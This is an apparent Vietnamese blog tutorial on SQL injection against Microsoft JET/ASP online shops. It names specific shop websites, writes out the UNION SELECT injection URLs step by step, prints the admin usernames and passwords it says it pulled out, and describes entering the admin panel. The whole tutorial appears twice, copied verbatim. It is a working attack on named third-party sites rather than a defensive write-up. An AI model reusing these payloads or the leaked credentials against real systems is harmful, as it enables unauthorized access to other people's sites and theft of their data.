Hiên nay nhiều Shop mắc lỗi JET DB
Microsoft JET Database Engine error ’80040e14′
Cách khai thác tương tự SQL Inject, thêm dấu “ ‘ “ sau link và tìm table, nhưng câu lênh và cách tìm table có khác chút
VD : http://www.kleer-fax.com/proddetail.asp?prod=23305
Thêm dấu “ ‘ “ vào http://www.kleer-fax.com/proddetail.asp?prod=23305’
Xuất hiện thông báo
Microsoft JET Database Engine error ’80040e14′ Syntax error in string in query _expression ‘pId=’23305”’. /proddetail.asp, line 246
Hi` hỉ..Thấy gì chưa á …..Giờ tìm table và collumn của nó á. Câu lệnh truy vấn của nó là
%27union%20select%201%20from%20admin
Sau khi thêm câu lệnh vào sau link :
http://www.kleer-fax.com/proddetail…%20from%20admin
Ta được:
Microsoft JET Database Engine error ’80040e14′ The number of columns in the two selected tables or queries of a union query do not match. /proddetail.asp, line 246
hì hì… có tồn tại columb chứ thông tin admin..Tiếp tục đê..coi columb chứa thông tinh Admin nằm ở đâu….
Ta thêm ,2,3,4 ..v.v….sau chỗ select%201
VD : http://www.kleer-fax.com/proddetail…union%20select% 201,2%20from%20admin (http://www.kleer-fax.com/proddetail…union%20select% 201,2%20from%20admin)
Ta lại được :
Microsoft JET Database Engine error ’80040e14′ The number of columns in the two selected tables or queries of a union query do not match. /proddetail.asp, line 246
Tiếp tục thêm ,3 xem sao nào
http://www.kleer-fax.com/proddetail…union%20select% (http://www.kleer-fax.com/proddetail…union%20select% 201,2,3%20from%20admin)
Lại được:
Microsoft JET Database Engine error ’80040e14′ The number of columns in the two selected tables or queries of a union query do not match. /proddetail.asp, line 246
Tiếp tục đến khi nào thấy đuợc Columb thì thôi á….
Ở Site này ..ta dừng lại ở 14
http://www.kleer-fax.com/proddetail…union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14%20from%20admin
Đây rùi :
Home : All Products
4-5-6 Item: 3 List Price: $9.00 USD 7 1
Chú ý số 7 và 1 nhé, đó là thông tin của 2 columb chứa thông tin Admin ( user/ pass)
Ta thay câu lệnh truy vấn user và pass admin vào vị trí 1 và 7:
and%201=0%20union%20select%201,2,’username:%20′%2b adminuser,4,5,6,’pass word:%20′%2badminpassword,8,9,10,11,12,13,14%20fro m%20admin
Và Kết quả : http://www.kleer-fax.com/proddetail…%201=0%20union% 20select%201%2c2%2c%27username:%20%27%2badminuser% 2c4%2c5%2c6%2c%27password:%20%27%2badminpassword%2 c8%2c9%2c10%2c11%2c12%2c13%2c14%20from%20admin
..Phu`…đây…
Item: username: kleer1 List Price: $9.00 USD password: do750boy
Ui ui..vào thử coi : http://www.kleer-fax.com/admin/login.asp
ui ui…hi` hi`…
Please choose from the list below.
Change username / password: Edit admin settings: Edit categories: Edit products: Logout: Đuợc rùi á
Chú ý: Khi union được mà ko báo lỗi thì mới dùng and 1=0
Trường hợp này thì phải thêm vào á….1 site tương tự cũng dính lỗi này, mà ko cần thêm and 1=0 khi truy vấn thông tin Admin
http://www.satinslippers.com/shop/p…prod=puckerpots
Ở Site này
Sau khi tìm table
http://www.satinslippers.com/shop/proddeta…pots23305′% 20union%20select%201,2,3,4,5,6,7,8,9,10%20from%20a dmin
Ta được 2 Colum 2 va 8
( Nhớ nhìn kĩ chút…vì site này nó bị lệch chút đỉnh á , mới đầu MAY lay hoay nhìn ko ra cái columb á, tưởng làm sai gì rồi á…ui ui..thì ra có á…)
http://www.satinslippers.com/shop/p…ckerpots%27%20u nion%20select%201%2c%27username:%20%27%2badminuser %2c3%2c4%2c5%2c6%2c7%
2c%27password:%20%27%2badminpassword%2c9%2c10%20fr om%20admin
Ok , ra rùi username: satinslippers password: ss2980
. Kiếm link đăng nhập thoai
Microsoft JET Database Engine error ’80040e14′
Cách khai thác tương tự SQL Inject, thêm dấu “ ‘ “ sau link và tìm table, nhưng câu lênh và cách tìm table có khác chút
VD : http://www.kleer-fax.com/proddetail.asp?prod=23305
Thêm dấu “ ‘ “ vào http://www.kleer-fax.com/proddetail.asp?prod=23305’
Xuất hiện thông báo
Microsoft JET Database Engine error ’80040e14′ Syntax error in string in query _expression ‘pId=’23305”’. /proddetail.asp, line 246
Hi` hỉ..Thấy gì chưa á …..Giờ tìm table và collumn của nó á. Câu lệnh truy vấn của nó là
%27union%20select%201%20from%20admin
Sau khi thêm câu lệnh vào sau link :
http://www.kleer-fax.com/proddetail…%20from%20admin
Ta được:
Microsoft JET Database Engine error ’80040e14′ The number of columns in the two selected tables or queries of a union query do not match. /proddetail.asp, line 246
hì hì… có tồn tại columb chứ thông tin admin..Tiếp tục đê..coi columb chứa thông tinh Admin nằm ở đâu….
Ta thêm ,2,3,4 ..v.v….sau chỗ select%201
VD : http://www.kleer-fax.com/proddetail…union%20select% 201,2%20from%20admin (http://www.kleer-fax.com/proddetail…union%20select% 201,2%20from%20admin)
Ta lại được :
Microsoft JET Database Engine error ’80040e14′ The number of columns in the two selected tables or queries of a union query do not match. /proddetail.asp, line 246
Tiếp tục thêm ,3 xem sao nào
http://www.kleer-fax.com/proddetail…union%20select% (http://www.kleer-fax.com/proddetail…union%20select% 201,2,3%20from%20admin)
Lại được:
Microsoft JET Database Engine error ’80040e14′ The number of columns in the two selected tables or queries of a union query do not match. /proddetail.asp, line 246
Tiếp tục đến khi nào thấy đuợc Columb thì thôi á….
Ở Site này ..ta dừng lại ở 14
http://www.kleer-fax.com/proddetail…union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14%20from%20admin
Đây rùi :
Home : All Products
4-5-6 Item: 3 List Price: $9.00 USD 7 1
Chú ý số 7 và 1 nhé, đó là thông tin của 2 columb chứa thông tin Admin ( user/ pass)
Ta thay câu lệnh truy vấn user và pass admin vào vị trí 1 và 7:
and%201=0%20union%20select%201,2,’username:%20′%2b adminuser,4,5,6,’pass word:%20′%2badminpassword,8,9,10,11,12,13,14%20fro m%20admin
Và Kết quả : http://www.kleer-fax.com/proddetail…%201=0%20union% 20select%201%2c2%2c%27username:%20%27%2badminuser% 2c4%2c5%2c6%2c%27password:%20%27%2badminpassword%2 c8%2c9%2c10%2c11%2c12%2c13%2c14%20from%20admin
..Phu`…đây…
Item: username: kleer1 List Price: $9.00 USD password: do750boy
Ui ui..vào thử coi : http://www.kleer-fax.com/admin/login.asp
ui ui…hi` hi`…
Please choose from the list below.
Change username / password: Edit admin settings: Edit categories: Edit products: Logout: Đuợc rùi á
Chú ý: Khi union được mà ko báo lỗi thì mới dùng and 1=0
Trường hợp này thì phải thêm vào á….1 site tương tự cũng dính lỗi này, mà ko cần thêm and 1=0 khi truy vấn thông tin Admin
http://www.satinslippers.com/shop/p…prod=puckerpots
Ở Site này
Sau khi tìm table
http://www.satinslippers.com/shop/proddeta…pots23305′% 20union%20select%201,2,3,4,5,6,7,8,9,10%20from%20a dmin
Ta được 2 Colum 2 va 8
( Nhớ nhìn kĩ chút…vì site này nó bị lệch chút đỉnh á , mới đầu MAY lay hoay nhìn ko ra cái columb á, tưởng làm sai gì rồi á…ui ui..thì ra có á…)
http://www.satinslippers.com/shop/p…ckerpots%27%20u nion%20select%201%2c%27username:%20%27%2badminuser %2c3%2c4%2c5%2c6%2c7%
2c%27password:%20%27%2badminpassword%2c9%2c10%20fr om%20admin
Ok , ra rùi username: satinslippers password: ss2980
. Kiếm link đăng nhập thoai
0 Nhận Xét:
Post a Comment